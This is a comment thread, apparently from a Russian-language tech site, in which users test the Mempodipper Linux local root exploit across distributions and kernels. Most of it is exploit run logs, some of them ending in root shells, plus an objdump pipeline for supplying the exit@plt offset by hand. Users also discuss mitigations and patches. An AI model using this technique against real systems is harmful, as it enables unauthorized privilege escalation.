
Comments 44

The trick doesn't work. Gentoo Hardened, kernel 3.1.5-hardened (ebuild from January 6, kernel patches from January 7). Probably PaX/grsecurity cover this hole.
$ gcc -o mempodipper mempodipper.c 
$ ./mempodipper 
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/19624/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[-] Could not resolve /bin/su. Specify the exit@plt function address manually.
[-] Usage: ./mempodipper -o ADDRESS
[-] Example: ./mempodipper -o 0x402178
$ ls -l /bin/su 
-rws--x--x 1 root root 34572 Сен 26 23:37 /bin/su
$ sudo objdump -d /bin/su | grep 'exit@plt' | head -n 1 | cut -d ' ' -f 1 | sed 's/^[0]*\([^0]*\)/0x\1/'
Пароль: 
0x1fac
$ ./mempodipper -o 0x1fac
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/19761/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x1f91.
[+] Executing su with shellcode.
$ id
uid=1000(powerman) gid=100(users) группы=100(users),...
$ strace -f ./mempodipper -o 0x1fac
...
write(2, "\320\235\320\265\320"..., 89) = -1 EIO (Input/output error)
exit_group(1)                           = ?
The reason is different; on Gentoo by default

-rws--x--x 1 root root 39320 Окт 24 21:29 /bin/su
An unprivileged user has no read permission on it.

The exploit simply didn't know the entry point.
If you feed it as a parameter the output of
objdump -d /bin/su|grep 'exit@plt'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\([^0]*\)/0x\1/'
everything will work.
For example
./mempodipper -o 0x402178
Well, that's exactly what I did, I think. It's all described in my comment.
Sorry, somehow I missed that.
Strange, on my sys-kernel/hardened-sources-3.1.5 with PaX & grsecurity enabled it works…
Maybe the point is that they are enabled "not enough" on your system? :)
On the gentoo-hardened mailing list they write that this exploit could theoretically work on hardened if:
  1. it is reimplemented in ret2libc style
  2. it brute-forces PIE (which only works if brute-force protection is disabled in grsec)
On AgiliaLinux 8.0 it doesn't work:

drakmail@thinkpad-x220:~$ uname -a
Linux thinkpad-x220 3.1.8 #1 SMP PREEMPT Sun Jan 8 18:53:10 UTC 2012 x86_64 Intel® Core(TM) i5-2410M CPU @ 2.30GHz GenuineIntel GNU/Linux
drakmail@thinkpad-x220:~$ ./a.out
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================

[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/21203/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x401e48.
[+] Calculating su padding.
[+] Seeking to offset 0x401e2b.
[+] Executing su with shellcode.
drakmail@thinkpad-x220:~$ whoami
drakmail
Just tested on Debian 6: doesn't work.

user2@dev1:~$ uname -a
Linux dev1 2.6.32-5-amd64 #1 SMP Mon Oct 3 03:59:20 UTC 2011 x86_64 GNU/Linux
user2@dev1:~$ gcc 1.c -o 1
user2@dev1:~$ ./1
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/9008/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x401fa8.
[+] Calculating su padding.
[+] Seeking to offset 0x401f8d.
[+] Executing su with shellcode.
user2@dev1:~$ whoami
user2
Darka wrote about Debian 6; I showed that it doesn't work there.
Most likely he just meant Debian wheezy, which will be released as version 7.
My apologies, it was indeed about 7.
Strange, I see you were user2 and still are ;-)
Oops, sorry, I didn't read to the end.
Wonderful! Everything works:

Linux bt 2.6.39.4 #1 SMP Thu Aug 18 13:38:02 NZST 2011 i686 GNU/Linux
Same here
Linux 3.2.0-030200-generic #201201042035 SMP Thu Jan 5 01:36:31 UTC 2012 x86_64 GNU/Linux
Alas:
% uname -a
Linux test 3.2.1-1-ARCH #1 SMP PREEMPT Fri Jan 13 08:19:09 UTC 2012 i686 Intel® Atom(TM) CPU N455 @ 1.66GHz GenuineIntel GNU/Linux


[+] Executing su with shellcode.
[1] 13091 segmentation fault ./mempodipper
% whoami
test

3.0.0-14-generic #23-Ubuntu SMP Mon Nov 21 20:34:47 UTC 2011 i686 athlon i386 GNU/Linux
Works
Yep, a video from 2005 referring to this problem as known since AT LEAST 1997 (but most likely known even earlier). Where can I place a bet that this problem (slightly modified, of course) will surface again?

Picture to attract attention:
Ubuntu 11.04: doesn't work. Desktop; no servers to test on.

Linux zerst 2.6.38-13-generic #54-Ubuntu SMP Tue Jan 3 13:44:52 UTC 2012 i686 athlon i386 GNU/Linux
Failed
Linux nb.cnet 2.6.41.4-1.fc15.x86_64 #1 SMP Tue Nov 29 11:53:48 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux

strace:
write(2, "su: ", 4) = -1 EIO (Input/output error)
write(2, "\320\277\320\276\320\273\321\214\320\267\320\276\320\262\320\260\321\202\320\265\320\273\321\214 H1\377\260i\17\5"..., 120) = -1 EIO (Input/output error)
write(2, "\n", 1) = -1 EIO (Input/output error)
CentOS 5 i386

$ cat /etc/issue
CentOS release 5.6 (Final)
Kernel \r on an \m

$ uname -r
2.6.18-238.19.1.el5PAE

$ gcc mempodipper.c -o mempodipper
$ ./mempodipper
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================

[+] Opening socketpair.
[+] Executing child from child fork.
[+] Opening parent mem /proc/24125/mem in child.
[+] Sending fd 6 to parent.
[+] Waiting for transferred fd in parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x1190.
[+] Calculating su padding.
[+] Seeking to offset 0x117a.
[+] Executing su with shellcode.
su: пользователь 1ш╟м─1ш╟.м─1иЁ╠╟? м─1юPhn/shh//bi┴Ц1рf╨-iR┴Ю1рRPS┴А1р1ю╟
м─ не существует

$ id
uid=501(test) gid=501(test) группы=501(test)

CentOS 6 i386

$ cat /etc/issue
CentOS Linux release 6.0 (Final)
Kernel \r on an \m

$ uname -r
2.6.32-71.29.1.el6.i686

$ gcc mempodipper.c -o mempodipper
$ ./mempodipper
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/6093/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x80491b0.
[+] Calculating su padding.
[+] Seeking to offset 0x804918e.
[+] Executing su with shellcode.

$ id
uid=500(111) gid=500(111) группы=500(111) контекст=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

ArchLinux i686

$ cat /etc/issue

Arch Linux \r (\n) (\l)

$ uname -r
3.2.1-1-ARCH

$ gcc mempodipper.c -o mempodipper
$ ./mempodipper
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/4720/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x8049180.
[+] Calculating su padding.
[+] Seeking to offset 0x804915e.
[+] Executing su with shellcode.
Ошибка сегментирования

$ id
uid=1001(test) gid=1001(test) группы=1001(test),7(lp),91(video),92(audio),93(optical),95(storage),98(power),100(users)

P.S.:
I'll try it on 64-bit Arch at home
P.P.S.:
I know it's >=2.6.39; the first example is a control sample
Sad.
[huzferd@arch ~]$ uname -a
Linux arch 3.2.1-1-ARCH #1 SMP PREEMPT Fri Jan 13 06:50:31 CET 2012 x86_64 Pentium® Dual-Core CPU E6500 @ 2.93GHz GenuineIntel GNU/Linux
[huzferd@arch ~]$ gcc run.c -o run
[huzferd@arch ~]$ ./run
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/1215/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x401dd0.
[+] Calculating su padding.
[+] Seeking to offset 0x401dae.
[+] Executing su with shellcode.
[huzferd@arch ~]$ whoami
huzferd
[huzferd@arch ~]$ pacman -S
ошибка: Вы не можете выполнить эту операцию, не являясь суперпользователем (root).
blacklynx@blacklynx:~/Downloads$ uname -a
Linux blacklynx 3.0.0-15-generic-pae #25-Ubuntu SMP Mon Jan 2 19:40:15 UTC 2012 i686 i686 i386 GNU/Linux
blacklynx@blacklynx:~/Downloads$ ./memodipper
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/10262/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x8049520.
[+] Calculating su padding.
[+] Seeking to offset 0x8049514.
[+] Executing su with shellcode.
# id
uid=0(root) gid=0(root)
About 5 minutes after your comment a patch closing the vulnerability on 11.10 came out (link).
Just updated to
Linux home 3.1.6-gentoo #1 SMP Mon Jan 23 17:23:35 CET 2012 x86_64 AMD Athlon(tm) 64 X2 Dual Core Processor 6000+ AuthenticAMD GNU/Linux
and root works.
Applied the latest update for LinuxMint 12, everything's fine now :)
Linux anri-pc 3.0.0-15-generic #26-Ubuntu SMP Fri Jan 20 17:23:00 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
On 3.1.5-hardened the exploit doesn't work. Reproduced it on desktops with gentoo-sources; already patched and almost finished rebuilding the kernel.
Tested in a VM with Debian squeeze, kernels 2.6.39 and 3.1.0-0. The exploit worked on both.

updating
apt-get update && apt-get upgrade
обновлено 0, установлено 0 новых пакетов, для удаления отмечено 0 пакетов, и 0 пакетов не обновлено.

uname -a
Linux debian 2.6.39-bpo.2-amd64 #1 SMP Tue Jul 26 10:35:23 UTC 2011 x86_64 GNU/Linux

$ whoami
alex
$ ~/expl
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/2468/mem in child.
[+] Sending fd 8 to parent.
[+] Received fd at 8.
[+] Assigning fd 8 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x401fa8.
[+] Calculating su padding.
[+] Seeking to offset 0x401f8d.
[+] Executing su with shellcode.
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root),1004(alex)

uname -a
Linux debian 3.1.0-0.bpo.1-amd64 #1 SMP Mon Jan 23 08:42:50 UTC 2012 x86_64 GNU/Linux

$ whoami
alex
$ ~/expl
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/2468/mem in child.
[+] Sending fd 8 to parent.
[+] Received fd at 8.
[+] Assigning fd 8 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x401fa8.
[+] Calculating su padding.
[+] Seeking to offset 0x401f8d.
[+] Executing su with shellcode.
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root),1004(alex)
You can find out whether you are affected with: grsecurity.net/~spender/correct_proc_mem_reproducer.c. And without the hassle with su.
Linux mao-note-arch 3.2.1-1-ARCH

Answer: vulnerable

But mempodipper doesn't work with either automatic or manual offset specification.
-bash-4.1$ uname -a
Linux centos 2.6.32-220.2.1.el6.x86_64 #1 SMP Fri Dec 23 02:21:33 CST 2011 x86_64 x86_64 x86_64 GNU/Linux
-bash-4.1$ ./ex.c
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/6583/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x1e70.
[+] Calculating su padding.
[+] Seeking to offset 0x1e62.
[+] Executing su with shellcode.
-bash-4.1$

Curious: it says the problem is in kernels 2.6.39 and above. What's the point of testing on older kernels and writing "doesn't work" yet again?